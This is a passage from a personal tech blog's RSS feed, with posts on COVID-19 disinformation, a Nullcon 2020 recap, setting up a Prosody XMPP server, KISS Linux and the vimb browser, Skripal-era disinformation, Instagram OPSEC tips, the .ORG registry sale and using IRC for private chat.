There has been some speculation that as the Trump Administration has been constantly raising the issue of growing Chinese global competitiveness as a direct threat to American national security and economic dominance, it might be possible that Washington has created and unleashed the virus in a bid to bring Beijing’s growing economy and military might down a few notches. It is, to be sure, hard to believe that even the Trump White House would do something so reckless, but there are precedents for that type of behavior

These “theories”, as is evident, are getting wilder and wilder.

Unsurprisingly, China produces the most amount of content related to the coronavirus, but they’re quite distinct in comparison to Russian and Iranian media. The general theme behind Chinese narratives is critisizing the West for…a lot of things.

Global Times claims that democracy is an insufficient system to battle the coronavirus. They blame the U.S. for unfair media coverage against China, and other anti-China narratives. There are a ton other articles that play the racism/discrimination card—I wouldn’t blame them though. Here’s one.

In the case of India, most disinfo (actually, misinfo) is mostly just pseudoscientific / alternative medicine / cures in the form of WhatsApp forwards—“Eat foo! Eat bar!”.1

I’ve also been noticing a ton of COVID-19 / coronavirus related domain registrations happening. Expect phishing and malware campaigns using the virus as a theme. In the past 24 hrs, ~450 .com domains alone were registered.

corona domains

Anywho, there are bigger problems at hand—like the fact that my uni still hasn’t suspended classes!

]]>
https://icyphox.sh/blog/covid19-disinfoSun, 15 Mar 2020 00:00:00 +0000https://icyphox.sh/blog/covid19-disinfo
Nullcon 2020Disclaimer: Political.

This year’s conference was at the Taj Hotel and Convention center, Dona Paula, and its associated party at Cidade de Goa, also by Taj. Great choice of venue, perhaps even better than last time. The food was fine, the views were better.

With those things out of the way—let’s talk talks. I think I preferred the panels to the talks—I enjoy a good, stimulating discussion as opposed to only half-understanding a deeply technical talk—but that’s just me. But there was this one talk that I really enjoyed, perhaps due to its unintended comedic value; I’ll get into that later.

The list of panels/talks I attended in order:

Day 1

  • Keynote: The Metadata Trap by Micah Lee (Talk)
  • Securing the Human Factor (Panel)
  • Predicting Danger: Building the Ideal Threat Intelligence Model (Panel)
  • Lessons from the Cyber Trenches (Panel)
  • Mlw 41#: a new sophisticated loader by APT group TA505 by Alexey Vishnyakov (Talk)
  • Taking the guess out of Glitching by Adam Laurie (Talk)
  • Keynote: Cybersecurity in India—Information Assymetry, Cross Border Threats and National Sovereignty by Saumil Shah (Talk)

Day 2

  • Keynote: Crouching hacker, killer robot? Removing fear from cyber-physical security by Stefano Zanero (Talk)
  • Supply Chain Security in Critical Infrastructure Systems (Panel)
  • Putting it all together: building an iOS jailbreak from scratch by Umang Raghuvanshi (Talk)
  • Hack the Law: Protection for Ethical Cyber Security Research in India (Panel)

Re: Closing keynote

I wish I could link the talk, but it hasn’t been uploaded just yet. I’ll do it once it has. So, I’ve a few comments I’d like to make on some of Saumil’s statements.

He proposed that the security industry trust the user more, and let them make the decisions pertaining to personal security / privacy. Except…that’s just not going to happen. If all users were capable of making good, security-first choices—we as an industry don’t need to exist. But that is unfortunately not the case. Users are dumb. They value convenience and immediacy over security. That’s the sad truth of the modern age.

Another thing he proposed was that the Indian Government build our own “Military Grade” and “Consumer Grade” encryption.

…what?

A “security professional” suggesting that we roll our own crypto? What even. Oh and, to top it off—when Raman, very rightly countered saying that the biggest opponent to encryption is the Government, and trusting them to build safe cryptosystems is probably not wise, he responded by saying something to the effect of “Eh, who cares? If they want to backdoor it, let them.”

Bruh moment.

He also had some interesting things to say about countering disinformation. He said, and I quote “Join the STFU University”.

¿wat? Is that your best solution?

Judging by his profile, and certain other things he said in the talk, it is safe to conclude that his ideals are fairly…nationalistic. I’m not one to police political opinions, I couldn’t care less which way you lean, but the statements made in the talk were straight up incorrect.

Closing thoughts

This came out more rant-like than I’d intended. It is also the first blog post where I dip my toes into politics. I’ve some thoughts on more controversial topics for my next entry. That’ll be fun, especially when my follower count starts dropping. LULW.

Saumil, if you ever end up reading this, note that this is not a personal attack. I think you’re a cool guy.

Note to the Nullcon organizers: you guys did a fantastic job running the conference despite Corona-chan’s best efforts. I’d like to suggest one little thing though—please VET YOUR SPEAKERS more!

group pic

]]>
https://icyphox.sh/blog/nullcon-2020Mon, 09 Mar 2020 00:00:00 +0000https://icyphox.sh/blog/nullcon-2020
Setting up Prosody for XMPPRemember the IRC for DMs article I wrote a while back? Well…it’s safe to say that IRC didn’t hold up too well. It first started with the bot. Buggy code, crashed a lot—we eventually gave up and didn’t bring the bot back up. Then came the notifications, or lack thereof. Revolution IRC has a bug where your custom notification rules just get ignored after a while. In my case, this meant that notifications for #crimson stopped entirely. Unless, of course, Nerdy pinged me each time.

Again, none of these problems are inherent to IRC itself. IRC is fantastic, but perhaps wasn’t the best fit for our usecase. I still do use IRC though, just not for 1-on-1 conversations.

Why XMPP?

For one, it’s better suited for 1-on-1 conversations. It also has support for end-to-end encryption (via OMEMO), something IRC doesn’t have.1 Also, it isn’t centralized (think: email).

So…Prosody

Prosody is an XMPP server. Why did I choose this over ejabberd, OpenFire, etc.? No reason, really. Their website looked cool, I guess.

Installing

Setting it up was pretty painless (I’ve experienced worse). If you’re on a Debian-derived system, add:

# modify according to your distro
deb https://packages.prosody.im/debian buster main 

to your /etc/apt/sources.list, and:

# apt update
# apt install prosody

Configuring

Once installed, you will find the config file at /etc/prosody/prosody.cfg.lua. Add your XMPP user (we will make this later), to the admins = {} line.

admins = {"user@chat.example.com"}

Head to the modules_enabled section, and add this to it:

modules_enabled = {
    "posix";
    "omemo_all_access";
...
    -- uncomment these
    "groups";
    "mam";
    -- and any others you think you may need
}

We will install the omemo_all_access module later.

Set c2s_require_encryption, s2s_require_encryption, and s2s_secure_auth to true. Set the pidfile to /tmp/prosody.pid (or just leave it as default?).

By default, Prosody stores passwords in plain-text, so fix that by setting authentication to "internal_hashed"

Head to the VirtualHost section, and add your vhost. Right above it, set the path to the HTTPS certificate and key:

certificates = "certs"    -- relative to your config file location
https_certificate = "certs/chat.example.com.crt"
https_key = "certs/chat.example.com.key"
...

VirtualHost "chat.example.com"

I generated these certs using Let’s Encrypt’s certbot, you can use whatever. Here’s what I did:

# certbot --nginx -d chat.example.com

This generates certs at /etc/letsencrypt/live/chat.example.com/. You can trivially import these certs into Prosody’s /etc/prosody/certs/ directory using:

# prosodyctl cert import /etc/letsencrypt/live/chat.example.com

Plugins

All the modules for Prosody can be hg clone’d from https://hg.prosody.im/prosody-modules. You will, obviously, need Mercurial installed for this.

Clone it somewhere, and:

# cp -R prosody-modules/mod_omemo_all_access /usr/lib/prosody/modules

Do the same thing for whatever other module you choose to install. Don’t forget to add it to the modules_enabled section in the config.

Adding users

prosodyctl makes this a fairly simple task:

$ prosodyctl adduser user@chat.example.com

You will be prompted for a password. You can optionally, enable user registrations from XMPP/Jabber clients (security risk!), by setting allow_registration = true.

I may have missed something important, so here’s my config for reference.

Closing notes

That’s pretty much all you need for 1-on-1 E2EE chats. I don’t know much about group chats just yet—trying to create a group in Conversations gives a “No group chat server found”. I will figure it out later.

Another thing that doesn’t work in Conversations is adding an account using an SRV record.2 Which kinda sucks, because having a chat. subdomain isn’t very clean, but whatever.

Oh, also—you can message me at icy@chat.icyphox.sh.


  1. I’m told IRC supports OTR, but I haven’t ever tried. 

  2. https://prosody.im/doc/dns 

]]>
https://icyphox.sh/blog/prosodyTue, 18 Feb 2020 00:00:00 +0000https://icyphox.sh/blog/prosody
Status updateIt’s only been a two weeks since I got back to campus, and we’ve already got our first round of cycle tests starting this Tuesday. Granted, I returned a week late, but…that’s nuts!

We’re two whole weeks into 2020; I should’ve been working on something status update worthy, right? Not really, but we’ll see.

No more Cloudflare!

Yep. If you weren’t aware—pre-2020 this site was behind Cloudflare SSL and their DNS. I have since migrated off it to he.net, thanks to highly upvoted Lobste.rs comment. Because of this switch, I infact, learnt a ton about DNS.

Migrating to HE was very painless, but I did have to research a lot about PTR records—Cloudflare kinda dumbs it down. In my case, I had to rename my DigitalOcean VPS instance to the FQDN, which then automagically created a PTR record at DO’s end.

I dropped icyrc

The IRC client I was working on during the end of last December--early-January? Yeah, I lost interest. Apparently writing C and ncurses isn’t very fun or stimulating.

This also means I’m back on weechat. Until I find another client that plays well with ZNC, that is.

KISS stuff

I now maintain two new packages in the KISS community repository—2bwm and aerc! The KISS package system is stupid simple to work with. Creating packages has never been easier.

icyphox.sh/friends

Did you notice that yet? I’ve been curating a list of people I know IRL and online, and linking to their online presence. This is like a webring of sorts, and promotes inter-site traffic—making the web more “web” again.

If you know me, feel free to hit me up and I’ll link your site too! My apologies if I’ve forgotten your name.

Patreon!

Is this big news? I dunno, but yes—I now have a Patreon. I figured I’d cash in on the newfound traffic my site’s been getting. There won’t be any exclusive content or any tiers or whatever. Nothing will change. Just a place for y’all to toss me some $$$ if you wish to do so. ;)

Oh, and it’s at patreon.com/icyphox.

Misc.

The Stormlight Archive is likely the best epic I have ever read till date. I’m still not done yet; about 500 odd pages to go as of this writing. But wow, Brandon really does know how to build worlds and magic systems. I cannot wait to read all about the cosmere.

I have also been working out for the past month or so. I can see them gainzzz. I plan to keep track of my progress, I just don’t know how to quantify it. Perhaps I’ll log the number of reps × sets I do each time, and with what weights. I can then look back to see if either the weights have increased since, or the number of reps × sets have. If you know of a better way to quantify progress, let me know! I’m pretty new to this.

]]>
https://icyphox.sh/blog/2020-01-18Sat, 18 Jan 2020 00:00:00 +0000https://icyphox.sh/blog/2020-01-18
Vimb&#58; my Firefox replacementAfter having recently installed KISS, and building Firefox from source, I was exposed to the true monstrosity that Firefox—and web browsers in general---is. It took all of 9 hours to build the dependencies and then Firefox itself.

Sure, KISS now ships Firefox binaries in the firefox-bin package; I decided to get rid of that slow mess anyway.

Enter vimb

vimb is a browser based on webkit2gtk, with a Vim-like interface. webkit2gtk builds in less than a minute—it blows Firefox out of the water, on that front.

There isn’t much of a UI to it—if you’ve used Vimperator/Pentadactyl (Firefox plugins), vimb should look familiar to you. It can be configured via a config.h or a text based config file at ~/.config/vimb/config. Each “tab” opens a new instance of vimb, in a new window but this can get messy really fast if you have a lot of tabs open.

Enter tabbed

tabbed is a tool to embed X apps which support xembed into a tabbed UI. This can be used in conjunction with vimb, like so:

tabbed vimb -e

Where the -e flag is populated with the XID, by tabbed. Configuring Firefox-esque keybinds in tabbed’s config.h is relatively easy. Once that’s done—voilà! A fairly sane, Vim-like browsing experience that’s faster and has a smaller footprint than Firefox.

Ad blocking

Ad blocking support isn’t built-in and there is no plugin system available. There are two options for ad blocking:

  1. wyebadblock
  2. /etc/hosts

Caveats

Some websites tend to not work because they detect vimb as an older version of Safari (same web engine). This is a minor inconvenience, and not a dealbreaker for me. I also cannot login to Google’s services for some reason, which is mildly annoying, but it’s good in a way—I am now further incentivised to dispose of my Google account.

And here’s the screenshot y’all were waiting for:

vimb

]]>
https://icyphox.sh/blog/mnml-browsingThu, 16 Jan 2020 00:00:00 +0000https://icyphox.sh/blog/mnml-browsing
Five days in a TTYThis new semester has been pretty easy on me, so far. I hardly every have any classes (again, so far), and I’ve a ton of free time on my hands. This calls for—yep---a distro hop!

Why KISS?

KISS has been making rounds on the interwebz lately.1 The Hacker News post spurred quite the discussion. But then again, that is to be expected from Valleybros who use macOS all day. :^)

From the website,

An independent Linux® distribution with a focus on simplicity and the concept of “less is more”. The distribution targets only the x86-64 architecture and the English language.

Like many people did in the HN thread, “simplicity” here is not to be confused with “ease”. It is instead, simplicity in terms of lesser and cleaner code—no Poetterware.

This, I can get behind. A clean system with less code is like a clean table. It’s nice to work on. It also implies security to a certain extent since there’s a smaller attack surface.

The kiss package manager is written is pure POSIX sh, and does just enough. Packages are compiled from source and kiss automatically performs dependency resolution. Creating packages is ridiculously easy too.

Speaking of packages, all packages—both official & community repos—are run through shellcheck before getting merged. This is awesome; I don’t think this is done in any other distro.

In essence, KISS sucks less.

Installing KISS

The install guide is very easy to follow. Clear instructions that make it hard to screw up; that didn’t stop me from doing so, however.

Day 1

Although technically not in a TTY, it was still not in the KISS system—I’ll count it. I’d compiled the kernel in the chroot and decided to use efibootmgr instead of GRUB. efibootmgr is a neat tool to modify the Intel Extensible Firmware Interface (EFI). Essentially, you boot the .efi directly as opposed to choosing which boot entry you want to boot, through GRUB. Useful if you have just one OS on the system. Removes one layer of abstraction.

Adding a new EFI entry is pretty easy. For me, the command was:

efibootmgr --create 
           --disk /dev/nvme0n1 \
           --part 1 \
           --label KISS Linux \
           --loader /vmlinuz
           --unicode 'root=/dev/nvme0n1p3 rw'  # kernel parameters

Mind you, this didn’t work the first time, or the second, or the third … a bunch of trial and error (and asking on #kisslinux) later, it worked.

Well, it booted, but not into KISS. Took a while to figure out that the culprit was CONFIG_BLK_DEV_NVME not having been set in the kernel config. Rebuild & reboot later, I was in.

Day 2

Networking! How fun. An ip a and I see that both USB tethering (ethernet) and wireless don’t work. Great. Dug around a bit—missing wireless drivers was the problem. Found my driver, a binary .ucode from Intel (eugh!). The whole day was spent in figuring out why the kernel would never load the firmware. I tried different variations—loading it as a module (=m), baking it in (=y) but no luck.

Day 3

I then tried Alpine’s kernel config but that was so huge and had a ton of modules and took far too long to build each time, much to my annoyance. Diffing their config and mine was about ~3000 lines! Too much to sift through. On a whim, I decided to scrap my entire KISS install and start afresh.

For some odd reason, after doing the exact same things I’d done earlier, my wireless worked this time. Ethernet didn’t, and still doesn’t, but that’s ok.

Building xorg-server was next, which took about an hour, mostly thanks to spotty internet. The build went through fine, though what wasn’t was no input after starting X. Adding my user to the input group wasn’t enough. The culprit this time was a missing xf86-xorg-input package. Installing that gave me my mouse back, but not the keyboard!

It was definitely not the kernel this time, because I had a working keyboard in the TTY.

Day 4 & Day 5

This was probably the most annoying of all, since the fix was trivial. By this point I had exhausted all ideas, so I decided to build my essential packages and setup my system. Building Firefox took nearly 9 hours, the other stuff were much faster.

I was still chatting on IRC during this, trying to zero down on what the problem could be. And then:

<dylanaraps> For starters I think st fails due to no fonts.

Holy shit! Fonts. I hadn’t installed any fonts. Which is why none of the applications I tried launching via sowm ever launched, and hence, I was lead to believe my keyboard was dead.

Worth it?

Absolutely. I cannot stress on how much of a learning experience this was. Also a test of my patience and perseverance, but yeah ok. I also think that this distro is my endgame (yeah, right), probably because other distros will be nothing short of disappointing, in one way or another.

Huge thanks to the folks at #kisslinux on Freenode for helping me throughout. And I mean, they really did. We chatted for hours on end trying to debug my issues.

I’ll now conclude with an obligatory screenshot.

scrot

]]>
https://icyphox.sh/blog/five-days-ttyMon, 13 Jan 2020 00:00:00 +0000https://icyphox.sh/blog/five-days-tty
2019 in reviewJust landed in a rainy Chennai, back in campus for my 6th semester. A little late to the “year in review blog post” party; travel took up most of my time. Last year was pretty eventful (at least in my books), and I think I did a bunch of cool stuff—let’s see!

Interning at SecureLayer7

Last summer, I interned at SecureLayer7, a security consulting firm in Pune, India. My work was mostly in hardware and embededded security research. I learnt a ton about ARM and MIPS reversing and exploitation, UART and JTAG, firmware RE and enterprise IoT security.

I also earned my first CVE! I’ve written about it in detail here.

Conferences

I attended two major conferences last year—Nullcon Goa and PyCon India. Both super fun experiences and I met a ton of cool people! Nullcon Twitter thread and PyCon blog post.

Talks

I gave two talks last year:

  1. Intro to Reverse Engineering at Cyware 2019
  2. "Smart lock? Nah dude." at PyCon India

Things I made

Not in order, because I CBA:

  • repl: More of a quick bash hack, I don’t really use it.
  • pw: A password manager. This, I actually do use. I’ve even written a tiny dmenu wrapper for it.
  • twsh: An incomplete twtxt client, in bash. I have yet to get around to finishing it.
  • alpine ports: My APKBUILDs for Alpine.
  • detotated: An IRC bot written in Python. See IRC for DMs.
  • icyrc: A no bullshit IRC client, because WeeChat is bloat.

I probably missed something, but whatever.

Blog posts

$ ls -1 pages/blog/*.md | wc -l
20

So excluding today’s post, and _index.md, that’s 18 posts! I had initially planned to write one post a month, but hey, this is great. My plan for 2020 is to write one post a week—unrealistic, I know, but I will try nevertheless.

I wrote about a bunch of things, ranging from programming to return-oriented-programming (heh), sysadmin and security stuff, and a hint of culture and philosophy. Nice!

The Python for Reverse Engineering post got a ton of attention on the interwebz, so that was cool.

Bye 2019

2019 was super productive! (in my terms). I learnt a lot of new things last year, and I can only hope to learn as much in 2020. :)

I’ll see you next week.

]]>
https://icyphox.sh/blog/2019-in-reviewThu, 02 Jan 2020 00:00:00 +0000https://icyphox.sh/blog/2019-in-review
Disinfo war&#58; RU vs GBThis entire sequence of events begins with the attempted poisoning of Sergei Skripal1, an ex-GRU officer who was a double-agent for the UK’s intelligence services. This hit attempt happened on the 4th of March, 2018. 8 days later, then-Prime Minister Theresa May formally accused Russia for the attack.

The toxin used in the poisoning was a nerve agent called Novichok. In addition to the British military-research facility at Porton Down, a small number of labs around the world were tasked with confirming Porton Down’s conclusions on the toxin that was used, by the OPCW (Organisation for the Prohibition of Chemical Weapons).

With the background on the matter out of the way, here are the different instances of well timed disinformation pushed out by Moscow.

The Russian offense

April 14, 2018

  • RT published an article claiming that Spiez had identified a different toxin—BZ, and not Novichok.
  • This was an attempt to shift the blame from Russia (origin of Novichok), to NATO countries, where it was apparently in use.
  • Most viral piece on the matter in all of 2018.

Although technically correct, this isn’t the entire truth. As part of protocol, the OPCW added a new substance to the sample as a test. If any of the labs failed to identify this substance, their findings were deemed untrustworthy. This toxin was a derivative of BZ.

Here are a few interesting things to note:

  1. The entire process starting with the OPCW and the labs is top-secret. How did Russia even know Speiz was one of the labs?
  2. On April 11th, the OPCW mentioned BZ in a report confirming Porton Down’s findings. Note that Russia is a part of OPCW, and are fully aware of the quality control measures in place. Surely they knew about the reason for BZ’s use?

Regardless, the Russian version of the story spread fast. They cashed in on two major factors to plant this disinfo:

  1. “NATO bad” : Overused, but surprisingly works. People love a story that goes full 180°.
  2. Spiez can’t defend itself: At the risk of revealing that it was one of the facilities testing the toxin, Spiez was only able to “not comment”.

April 3, 2018

  • The Independent publishes a story based on an interview with the chief executive of Porton Down, Gary Aitkenhead.
  • Aitkenhead says they’ve identified Novichok but “have not identified the precise source”.
  • Days earlier, Boris Johnson (then-Foreign Secretary) claimed that Porton Down confirmed the origin of the toxin to be Russia.
  • This discrepancy was immediately promoted by Moscow, and its network all over.

This one is especially interesting because of how simple it is to exploit a small contradiction, that could’ve been an honest mistake. This episode is also interesting because the British actually attempted damage control this time. Porton Down tried to clarify Aitkenhead’s statement via a tweet2:

Our experts have precisely identified the nerve agent as a Novichok. It is not, and has never been, our responsibility to confirm the source of the agent @skynews @UKmoments

Quoting the Defense One article on the matter:

The episode is seen by those inside Britain’s security communications team as the most serious misstep of the crisis, which for a period caused real concern. U.K. officials told me that, in hindsight, Aikenhead could never have blamed Russia directly, because that was not his job—all he was qualified to do was identify the chemical. Johnson, in going too far, was more damaging. Two years on, he is now prime minister.

May 2018

  • OPCW facilities receive an email from Spiez inviting them to a conference.
  • The conference itself is real, and has been organized before.
  • The email however, was not—attached was a Word document containing malware.
  • Also seen were inconsistencies in the email formatting, from what was normal.

This spearphishing campaign was never offically attributed to Moscow, but there are a lot of tells here that point to it being the work of a state actor:

  1. Attack targetting a specific group of individuals.
  2. Relatively high level of sophistication—email formatting, malicious Word doc, etc.

However, the British NCSC have deemed with “high confidence” that the attack was perpetrated by GRU. In the UK intelligence parlance, “highly likely” / “high confidence” usually means “definitely”.

Britain’s defense

September 5, 2018

The UK took a lot of hits in 2018, but they eventually came back:

  • Metropolitan Police has a meeting with the press, releasing their findings.
  • CCTV footage showing the two Russian hitmen was released.
  • Traces of Novichok identified in their hotel room.

This sudden news explosion from Britan’s side completely bulldozed the information space pertaining to the entire event. According to Defense One:

Only two of the 10 most viral stories in the weeks following the announcement were sympathetic to Russia, according to NewsWhip. Finally, officials recalled, it felt as though the U.K. was the aggressor. “This was all kept secret to put the Russians on the hop,” one told me. “Their response was all over the place from this point. It was the turning point.”

Earlier in April, 4 GRU agents were arrested in the Netherlands, who were there to execute a cyber operation against the OPCW (located in The Hague), via their WiFi networks. They were arrested by Dutch security, and later identifed as belonging to Unit 26165. They also seized a bunch of equipment from the room and their car.

The abandoned equipment revealed that the GRU unit involved had sent officers around the world to conduct similar cyberattacks. They had been in Malaysia trying to steal information about the investigation into the downed Malaysia Airlines Flight 17, and at a hotel in Lausanne, Switzerland, where a World Anti-Doping Agency (WADA) conference was taking place as Russia faced sanctions from the International Olympic Committee. Britain has said that the same GRU unit attempted to compromise Foreign Office and Porton Down computer systems after the Skripal poisoning.

October 4, 2018

UK made the arrests public, published a list of infractions commited by Russia, along with the specific GRU unit that was caught.

During this period, just one of the top 25 viral stories was from a pro-Russian outlet, RT—that too a fairly straightforward piece.

Wrapping up

As with conventional warfare, it’s hard to determine who won. Britain may have had the last blow, but Moscow—yet again---depicted their finesse in information warfare. Their ability to seize unexpected openings, gather intel to facilitate their disinformation campaigns, and their cyber capabilities makes them a formidable threat.

2020 will be fun, to say the least.

]]>
https://icyphox.sh/blog/ru-vs-gbThu, 12 Dec 2019 00:00:00 +0000https://icyphox.sh/blog/ru-vs-gb
Instagram OPSECWhich I am not, of course. But seeing as most of my peers are, I am compelled to write this post. Using a social platform like Instagram automatically implies that the user understands (to some level) that their personally identifiable information is exposed publicly, and they sign up for the service understanding this risk—or I think they do, anyway. But that’s about it, they go ham after that. Sharing every nitty gritty detail of their private lives without understanding the potential risks of doing so.

The fundamentals of OPSEC dictacte that you develop a threat model, and Instgrammers are obviously incapable of doing that—so I’ll do it for them.

Your average Instagrammer’s threat model

I stress on the word “average”, as in this doesn’t apply to those with more than a couple thousand followers. Those type of accounts inherently face different kinds of threats—those that come with having a celebrity status, and are not in scope of this analysis.

  • State actors: This doesn’t really fit into our threat model, since our target demographic is simply not important enough. That said, there are select groups of individuals that operate on Instagram1, and they can potentially be targetted by a state actor.

  • OSINT: This is probably the biggest threat vector, simply because of the amount of visual information shared on the platform. A lot can be gleaned from one simple picture in a nondescript alleyway. We’ll get into this in the DOs and DON’Ts in a bit.

  • Facebook & LE: Instagram is the last place you want to be doing an illegal, because well, it’s logged and more importantly—not end-to-end encrypted. Law enforcement can subpoena any and all account information. Quoting Instagram’s page on this:

a search warrant issued under the procedures described in the Federal Rules of Criminal Procedure or equivalent state warrant procedures upon a showing of probable cause is required to compel the disclosure of the stored contents of any account, which may include messages, photos, comments, and location information.

That out of the way, here’s a list of DOs and DON’Ts to keep in mind while posting on Instagram.

DON’Ts

  • Use Instagram for planning and orchestrating illegal shit! I’ve explained why this is a terrible idea above. Use secure comms—even WhatsApp is a better choice, if you have nothing else. In fact, try avoiding IG DMs altogether, use alternatives that implement E2EE.

  • Film live videos outside. Or try not to, if you can. You might unknowingly include information about your location: street signs, shops etc. These can be used to ascertain your current location.

  • Film live videos in places you visit often. This compromises your security at places you’re bound to be at.

  • Share your flight ticket in your story! I can’t stress this enough!!! Summer/winter break? “Look guys, I’m going home! Here’s where I live, and here’s my flight number—feel free to track me!”. This scenario is especially worrisome because the start and end points are known to the threat actor, and your arrival time can be trivially looked up—thanks to the flight number on your ticket. So, just don’t.

  • Post screenshots with OS specific details. This might border on pendantic, but better safe than sorry. Your phone’s statusbar and navbar are better cropped out of pictures. They reveal the time, notifications (apps that you use), and can be used to identify your phone’s operating system. Besides, the status/nav bar isn’t very useful to your screenshot anyway.

  • Share your voice. In general, reduce your footprint on the platform that can be used to identify you elsewhere.

  • Think you’re safe if your account is set to private. It doesn’t take much to get someone who follows you, to show show your profile on their device.

DOs

  • Post pictures that pertain to a specific location, once you’ve moved out of the location. Also applies to stories. It can wait.

  • Post pictures that have been shot indoors. Or try to; reasons above. Who woulda thunk I’d advocate bathroom selfies?

  • Delete old posts that are irrelevant to your current audience. Your friends at work don’t need to know about where you went to high school.

More DON’Ts than DOs, that’s very telling. Here are a few more points that are good OPSEC practices in general:

  • Think before you share. Does it conform to the rules mentioned above?
  • Compartmentalize. Separate as much as you can from what you share online, from what you do IRL. Limit information exposure.
  • Assess your risks: Do this often. People change, your environments change, and consequentially the risks do too.

Fin

Instagram is—much to my dismay---far too popular for it to die any time soon. There are plenty of good reasons to stop using the platform altogether (hint: Facebook), but that’s a discussion for another day.

Or be like me:

0 posts lul

And that pretty much wraps it up, with a neat little bow.


  1. https://darknetdiaries.com/episode/51/—Jack talks about Indian hackers who operate on Instagram. 

]]>
https://icyphox.sh/blog/ig-opsecMon, 02 Dec 2019 00:00:00 +0000https://icyphox.sh/blog/ig-opsec
Save .ORG!The .ORG top-level domain introduced in 1985, has been operated by the Public Interest Registry since 2003. The .ORG TLD is used primarily by communities, free and open source projects, and other non-profit organizations—although the use of the TLD isn’t restricted to non-profits.

The Internet Society or ISOC, the group that created the PIR, has decided to sell the registry over to a private equity firm—Ethos Capital.

What’s the problem?

There are around 10 million .ORG TLDs registered, and a good portion of them are non-profits and non-governmental organizations. As the name suggests, they don’t earn any profits and all their operations rely on a thin inflow of donations. A private firm having control of the .ORG domain gives them the power to make decisions that would be unfavourable to the .ORG community:

  • They control the registration/renewal fees of the TLD. They can hike the price if they wish to. As is stands, NGOs already earn very little—a .ORG price hike would put them in a very icky situation.

  • They can introduce Rights Protection Mechanisms or RPMs, which are essentially legal statements that can—if not correctly developed—jeopardize / censor completely legal non-profit activities.

  • Lastly, they can suspend domains at the whim of state actors. It isn’t news that nation states go after NGOs, targetting them with allegations of illegal activity. The registry being a private firm only simplifies the process.

Sure, these are just “what ifs” and speculations, but the risk is real. Such power can be abused and this would be severly detrimental to NGOs globally.

How can I help?

We need to get the ISOC to stop the sale. Head over to https://savedotorg.org and sign their letter. An email is sent on your behalf to:

  • Andrew Sullivan, CEO, ISOC
  • Jon Nevett, CEO, PIR
  • Maarten Botterman, Board Chair, ICANN
  • Göran Marby, CEO, ICANN

Closing thoughts

The Internet that we all love and care for is slowly being subsumed by megacorps and private firms, who’s only motive is to make a profit. The Internet was meant to be free, and we’d better act now if we want that freedom. The future looks bleak—I hope we aren’t too late.

]]>
https://icyphox.sh/blog/save-orgSat, 23 Nov 2019 00:00:00 +0000https://icyphox.sh/blog/save-org
Status updateThis month is mostly just unfun stuff, lined up in a neat schedule -- exams. I get all these cool ideas for things to do, and it’s always during exams. Anyway, here’s a quick update on what I’ve been up to.

Blog post queue

I realized that I could use this site’s repo’s issues to track blog post ideas. I’ve made a few, mostly just porting them over from my Google Keep note.

This method of using issues is great, because readers can chime in with ideas for things I could possibly discuss—like in this issue.

Contemplating a vite rewrite

vite, despite what the name suggests -- is awfully slow. Also, Python is bloat. Will rewriting it fix that? That’s what I plan to find out. I have a couple of choices of languages to use in the rewrite:

  • C: Fast, compiled. Except I suck at it. (cite?)
  • Nim: My favourite, but I’ll have to write bindings to lowdown(1). (nite?)
  • Shell: Another favourite, muh “minimalsm”. No downside, really. (shite?)

Oh, and did I mention—I want it to be compatible with vite. I don’t want to have to redo my site structure or its templates. At the moment, I rely on Jinja2 for templating, so I’ll need something similar.

IRC bot

My earlier post on IRC for DMs got quite a bit of traction, which was pretty cool. I didn’t really talk much about the bot itself though; I’m dedicating this section to detotated.1

Fairly simple Python code, using plain sockets. So far, we’ve got a few basic features in place:

  • .np command: queries the user’s last.fm to get the currently playing track
  • Fetches the URL title, when a URL is sent in chat

That’s it, really. I plan to add a .nps, or “now playing Spotify” command, since we share Spotify links pretty often.

Other

I’ve been reading some more manga, I’ll update the reading log when I, well… get around to it. Haven’t had time to do much in the past few weeks—the time at the end of a semester tends to get pretty tight. Here’s what I plan to get back to during this winter break:

  • Russian!
  • Window manager in Nim
  • vite rewrite, probably
  • The other blog posts in queue

I’ve also put off doing any “security work” for a while now, perhaps that’ll change this December. Or whenever.

With that ends my status update, on all things that I haven’t done.

]]>
https://icyphox.sh/blog/2019-11-16Sat, 16 Nov 2019 00:00:00 +0000https://icyphox.sh/blog/2019-11-16
IRC for DMsNerdy and I decided to try and use IRC for our daily communications, as opposed to non-free alternatives like WhatsApp or Telegram. This is an account of how that went.

The status quo of instant messaging apps

I’ve tried a ton of messaging applications—Signal, WhatsApp, Telegram, Wire, Jami (Ring), Matrix, Slack, Discord and more recently, DeltaChat.

Signal: It straight up sucks on Android. Not to mention the centralized architecture, and OWS’s refusal to federate.

WhatsApp: Facebook’s spyware that people use without a second thought. The sole reason I have it installed is for University’s class groups; I can’t wait to graduate.

Telegram: Centralized architecture and a closed-source server. It’s got a very nice Android client, though.

Jami: Distributed platform, free software. I am not going to comment on this because I don’t recall what my experience was like, but I’m not using it now… so if that’s indicative of anything.

Matrix (Riot): Distributed network. Multiple client implementations. Overall, pretty great, but it’s slow. I’ve had messages not send / not received a lot of times. Matrix + Riot excels in group communication, but really sucks for one-to-one chats.

Slack / Discord: sigh

DeltaChat: Pretty interesting idea—on paper. Using existing email infrastructure for IM sounds great, but it isn’t all that cash in practice. Email isn’t instant, there’s always a delay of give or take 5 to 10 seconds, if not more. This affects the flow of conversation. I might write a small blog post later, revewing DeltaChat.2

Why IRC?

It’s free, in all senses of the word. A lot of others have done a great job of answering this question in further detail, this is by far my favourite:

https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html

Using IRC’s private messages

This was the next obvious choice, but personal message buffers don’t persist in ZNC and it’s very annoying to have to do a /query nerdypepper (Weechat) or to search and message a user via Revolution IRC. The only unexplored option—using a channel.

Setting up a channel for DMs

A fairly easy process:

  • Set modes (on Rizon)1:

    #crimson [+ilnpstz 3]
    

    In essence, this limits the users to 3 (one bot), sets the channel to invite only, hides the channel from /whois and /list, and a few other misc. modes.

  • Notifications: Also a trivial task; a quick modification to lnotify.py to send a notification for all messages in the specified buffer (#crimson) did the trick for Weechat. Revolution IRC, on the other hand, has an option to setup rules for notifications—super convenient.

  • A bot: Lastly, a bot for a few small tasks—fetching URL titles, responding to .np (now playing) etc. Writing an IRC bot is dead simple, and it took me about an hour or two to get most of the basic functionality in place. The source is here. It is by no means “good code”; it breaks spectacularly from time to time.

In conclusion

As the subtitle suggests, using IRC has been great. It’s probably not for everyone though, but it fits my (and Nerdy’s) usecase perfectly.

P.S.: I’m not sure why the footnotes are reversed.


  1. Channel modes on Rizon

  2. It’s in queue

]]>
